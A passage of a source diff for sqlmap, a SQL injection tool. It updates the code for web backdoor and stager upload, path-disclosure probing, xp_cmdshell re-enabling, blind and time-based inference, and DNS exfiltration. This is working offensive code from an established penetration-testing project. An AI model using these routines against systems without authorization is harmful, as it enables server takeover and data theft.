basestring) and udfCount.isdigit(): + if udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: @@ -251,14 +246,10 @@ class UDF: return else: break - - elif isinstance(udfCount, int): - break - else: logger.warn("invalid value, only digits are allowed") - for x in range(0, udfCount): + for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) @@ -276,31 +267,27 @@ class UDF: self.udfs[udfName]["input"] = [] - default = 1 msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) + msg += "'%s'? (default: 1) " % udfName while True: - parCount = readInput(msg, default=default) + parCount = readInput(msg, default='1') - if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: + if parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break - elif isinstance(parCount, int): - break - else: logger.warn("invalid value, only digits >= 0 are allowed") - for y in range(0, parCount): + for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: - parType = readInput(msg, default=defaultType) + parType = readInput(msg, default=defaultType).strip() - if isinstance(parType, basestring) and parType.isdigit(): + if parType.isdigit(): logger.warn("you need to specify the data-type of the parameter") else: @@ -327,12 +314,12 @@ class UDF: msg = "do you want to call your injected user-defined " msg += "functions now? [Y/n/q] " - choice = readInput(msg, default="Y") + choice = readInput(msg, default='Y').upper() - if choice[0] in ("n", "N"): + if choice == 'N': self.cleanup(udfDict=self.udfs) return - elif choice[0] in ("q", "Q"): + elif choice == 'Q': self.cleanup(udfDict=self.udfs) raise SqlmapUserQuitException @@ -347,9 +334,9 @@ class UDF: msg += "\n[q] Quit" while True: - choice = readInput(msg) + choice = readInput(msg).upper() - if choice and choice[0] in ("q", "Q"): + if choice == 'Q': break elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) @@ -390,9 +377,8 @@ class UDF: cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: @@ -403,9 +389,8 @@ class UDF: self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] not in ("y", "Y"): + if not readInput(msg, default='Y', boolean=True): break self.cleanup(udfDict=self.udfs) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 40a403dc0..73b9fe707 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,10 +9,9 @@ import os import posixpath import re import StringIO +import tempfile import urlparse -from tempfile import mkstemp - from extra.cloak.cloak import decloak from lib.core.agent import agent from lib.core.common import arrayizeValue @@ -27,6 +26,7 @@ from lib.core.common import ntToPosixSlashes from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath +from lib.core.common import parseFilePaths from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr @@ -39,8 +39,10 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import OS from lib.core.enums import PAYLOAD +from lib.core.enums import PLACE from lib.core.enums import WEB_API from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT @@ -117,7 +119,7 @@ class Web: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE - page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) + page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) if "File uploaded" not in page: warnMsg = "unable to upload the file through the web file " @@ -197,15 +199,76 @@ class Web: self.webApi = choices[int(choice) - 1] break + if not kb.absFilePaths: + message = "do you want sqlmap to further try to " + message += "provoke the full path disclosure? [Y/n] " + + if readInput(message, default='Y', boolean=True): + headers = {} + been = set([conf.url]) + + for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I): + url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url) + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + for place in (PLACE.GET, PLACE.POST): + if place in conf.parameters: + value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place]) + if "[]" in value: + page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + cookie = None + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] + elif headers and HTTP_HEADER.SET_COOKIE in headers: + cookie = headers[HTTP_HEADER.SET_COOKIE] + + if cookie: + value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + directories = list(arrayizeValue(getManualDirectories())) directories.extend(getAutoDirectories()) directories = list(oset(directories)) + path = urlparse.urlparse(conf.url).path or '/' + if path != '/': + _ = [] + for directory in directories: + _.append(directory) + if not directory.endswith(path): + _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) + directories = _ + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - success = False for directory in directories: if not directory: @@ -219,8 +282,6 @@ class Web: if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): directory = "/%s" % directory - else: - directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory if not directory.endswith('/'): directory += '/' @@ -258,10 +319,10 @@ class Web: stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - handle, filename = mkstemp() - os.fdopen(handle).close() # close low level handle (causing problems later) + handle, filename = tempfile.mkstemp() + os.close(handle) - with open(filename, "w+") as f: + with open(filename, "w+b") as f: _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) @@ -309,7 +370,7 @@ class Web: _ = "tmpe%s.exe" % randomStr(lowercase=True) if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): - self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_')) + self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory else: @@ -329,9 +390,8 @@ class Web: message = "do you want to try the same method used " message += "for the file stager? [Y/n] " - getOutput = readInput(message, default="Y") - if getOutput in ("y", "Y"): + if readInput(message, default='Y', boolean=True): self._webFileInject(backdoorContent, backdoorName, directory) else: continue @@ -357,6 +417,4 @@ class Web: infoMsg += self.webBackdoorUrl logger.info(infoMsg) - success = True - break diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index f9c5f0b8f..6c9fd6928 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -33,7 +33,7 @@ from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.threads import getCurrentThreadData from lib.request import inject -class Xp_cmdshell: +class XP_cmdshell: """ This class defines methods to deal with Microsoft SQL Server xp_cmdshell extended procedure for plugins. @@ -45,7 +45,7 @@ class Xp_cmdshell: def _xpCmdshellCreate(self): cmd = "" - if Backend.isVersionWithin(("2005", "2008", "2012")): + if not Backend.isVersionWithin(("2000",)): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") @@ -56,7 +56,7 @@ class Xp_cmdshell: cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) - if Backend.isVersionWithin(("2005", "2008")): + if not Backend.isVersionWithin(("2000",)): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -83,10 +83,10 @@ class Xp_cmdshell: return cmd def _xpCmdshellConfigure(self, mode): - if Backend.isVersionWithin(("2005", "2008")): - cmd = self._xpCmdshellConfigure2005(mode) - else: + if Backend.isVersionWithin(("2000",)): cmd = self._xpCmdshellConfigure2000(mode) + else: + cmd = self._xpCmdshellConfigure2005(mode) inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -111,8 +111,8 @@ class Xp_cmdshell: errMsg += "storing console output within the back-end file system " errMsg += "does not have writing permissions for the DBMS process. " errMsg += "You are advised to manually adjust it with option " - errMsg += "--tmp-path switch or you will not be able to retrieve " - errMsg += "the commands output" + errMsg += "'--tmp-path' or you won't be able to retrieve " + errMsg += "the command(s) output" logger.error(errMsg) elif isNoneValue(output): logger.error("unable to retrieve xp_cmdshell output") @@ -255,9 +255,8 @@ class Xp_cmdshell: message = "xp_cmdshell extended procedure does not seem to " message += "be available. Do you want sqlmap to try to " message += "re-enable it? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(message, default='Y', boolean=True): self._xpCmdshellConfigure(1) if self._xpCmdshellCheck(): diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/__init__.py +++ b/lib/techniques/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/blind/__init__.py +++ b/lib/techniques/blind/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 5419bd9cb..100709480 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import re import threading import time @@ -41,9 +42,12 @@ from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR from lib.core.settings import MAX_BISECTION_LENGTH -from lib.core.settings import MAX_TIME_REVALIDATION_STEPS +from lib.core.settings import MAX_REVALIDATION_STEPS +from lib.core.settings import NULL from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import PAYLOAD_DELIMITER +from lib.core.settings import RANDOM_INTEGER_MARKER from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads @@ -64,6 +68,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None finalValue = None retrievedLength = 0 asciiTbl = getCharset(charsetType) + threadData = getCurrentThreadData() timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) @@ -89,11 +94,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return 0, retVal try: - # Set kb.partRun in case "common prediction" feature (a.k.a. "good - # samaritan") is used or the engine is called from the API + # Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API if conf.predictOutput: kb.partRun = getPartRun() - elif hasattr(conf, "api"): + elif conf.api: kb.partRun = getPartRun(alias=False) else: kb.partRun = None @@ -102,8 +106,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None firstChar = len(partialValue) elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): firstChar = 0 - elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): + elif (kb.fileReadMode or dump) and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 + if kb.fileReadMode: + firstChar *= 2 elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int): firstChar = int(firstChar) - 1 else: @@ -141,17 +147,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None length = None showEta = conf.eta and isinstance(length, int) - numThreads = min(conf.threads, length) + numThreads = min(conf.threads, length) or 1 if showEta: progress = ProgressBar(maxValue=length) - if timeBasedCompare and conf.threads > 1: + if timeBasedCompare and conf.threads > 1 and not conf.forceThreads: warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" singleTimeWarnMessage(warnMsg) if numThreads > 1: - if not timeBasedCompare: + if not timeBasedCompare or conf.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: @@ -162,7 +168,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and not conf.api: if isinstance(length, int) and conf.threads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) @@ -181,8 +187,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None else: posValue = ord(hintValue[idx - 1]) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + forgedPayload = agent.extractPayload(payload) + forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) + result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: @@ -195,24 +202,32 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None def validateChar(idx, value): """ - Used in time-based inference (in case that original and retrieved - value are not equal there will be a deliberate delay). + Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay """ + validationPayload = re.sub(r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload) + if "'%s'" % CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + + result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + + if result and timeBasedCompare: + result = threadData.lastCode == kb.injection.data[kb.technique].trueCode + if not result: + warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode) + singleTimeWarnMessage(warnMsg) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) - return not result + return result - def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None): + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 @@ -232,8 +247,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] - if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: - charTbl.remove(ord('\n')) + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + charTbl.remove(ord(char)) if not charTbl: return None @@ -250,22 +267,72 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] + firstCheck = False + lastCheck = False + unexpectedCode = False while len(charTbl) != 1: - position = (len(charTbl) >> 1) + position = None + + if charsetType is None: + if not firstCheck: + try: + try: + lastChar = [_ for _ in threadData.shared.value if _ is not None][-1] + except IndexError: + lastChar = None + if 'a' <= lastChar <= 'z': + position = charTbl.index(ord('a') - 1) # 96 + elif 'A' <= lastChar <= 'Z': + position = charTbl.index(ord('A') - 1) # 64 + elif '0' <= lastChar <= '9': + position = charTbl.index(ord('0') - 1) # 47 + except ValueError: + pass + finally: + firstCheck = True + + elif not lastCheck and numThreads == 1: # not usable in multi-threading environment + if charTbl[(len(charTbl) >> 1)] < ord(' '): + try: + # favorize last char check if current value inclines toward 0 + position = charTbl.index(1) + except ValueError: + pass + finally: + lastCheck = True + + if position is None: + position = (len(charTbl) >> 1) + posValue = charTbl[position] + falsePayload = None if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) + + if timeBasedCompare: + if kb.responseTimeMode: + kb.responseTimePayload = falsePayload + else: + kb.responseTimePayload = None result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) + if not timeBasedCompare: + unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode) + if unexpectedCode: + warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode + singleTimeWarnMessage(warnMsg) + if result: minValue = posValue @@ -305,26 +372,27 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None retVal = minValue + 1 if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): - if timeBasedCompare and not validateChar(idx, retVal): + if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec - kb.timeValidCharsRun = 0 - if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS: + threadData.validationRun = 0 + if retried < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) - if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: - conf.timeSec += 1 - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.warn(warnMsg) + if timeBasedCompare: + if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: + conf.timeSec += 1 + warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') + logger.warn(warnMsg) - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - dbgMsg = "turning off time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: + dbgMsg = "turning off time auto-adjustment mechanism" + logger.debug(dbgMsg) + kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - return getChar(idx, originalTbl, continuousOrder, expand, shiftTable) + return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal) logger.error(errMsg) @@ -332,8 +400,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return decodeIntToUnicode(retVal) else: if timeBasedCompare: - kb.timeValidCharsRun += 1 - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: + threadData.validationRun += 1 + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES @@ -363,8 +431,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Go multi-threading (--threads > 1) if conf.threads > 1 and isinstance(length, int) and length > 1: - threadData = getCurrentThreadData() - threadData.shared.value = [None] * length threadData.shared.index = [firstChar] # As list for python nested function scoping threadData.shared.start = firstChar @@ -427,7 +493,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): output = output[:-2] + '..' - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and not conf.api: _ = count - firstChar output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) @@ -457,12 +523,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) - if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and infoMsg and not conf.api: dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar + threadData.shared.value = "" while True: index += 1 @@ -492,7 +559,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if result: if showEta: progress.progress(time.time() - charStart, len(commonValue)) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): + elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(commonValue[index - 1:])) finalValue = commonValue @@ -538,11 +605,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if kb.data.processChar: val = kb.data.processChar(val) - partialValue += val + threadData.shared.value = partialValue = partialValue + val if showEta: progress.progress(time.time() - charStart, index) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): + elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(val)) # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces @@ -569,11 +636,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None elif partialValue: hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) - if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"): + if conf.hexConvert and not abortedFlag and not conf.api: infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not showEta and not conf.api: dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: @@ -587,6 +654,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None raise KeyboardInterrupt _ = finalValue or partialValue + return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ def queryOutputLength(expression, payload): @@ -597,8 +665,9 @@ def queryOutputLength(expression, payload): infoMsg = "retrieving the length of query output" logger.info(infoMsg) - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py deleted file mode 100644 index 8d7bcd8f0..000000000 --- a/lib/techniques/brute/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/dns/__init__.py +++ b/lib/techniques/dns/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 1d8b8c569..7fc652fdd 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,7 +24,7 @@ def dnsTest(payload): if not kb.dnsTest: errMsg = "data retrieval through DNS channel failed" if not conf.forceDns: - conf.dnsName = None + conf.dnsDomain = None errMsg += ". Turning off DNS exfiltration support" logger.error(errMsg) else: diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 8b09335bd..66a489946 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -46,7 +46,7 @@ def dnsUse(payload, expression): count = 0 offset = 1 - if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: @@ -61,11 +61,15 @@ def dnsUse(payload, expression): chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) + extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) + if extendedField != fieldToCastStr: # e.g. MIN(surname) + nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) + fieldToCastStr = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) nulledCastedField = agent.hexConvertField(nulledCastedField) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) + expressionRequest = 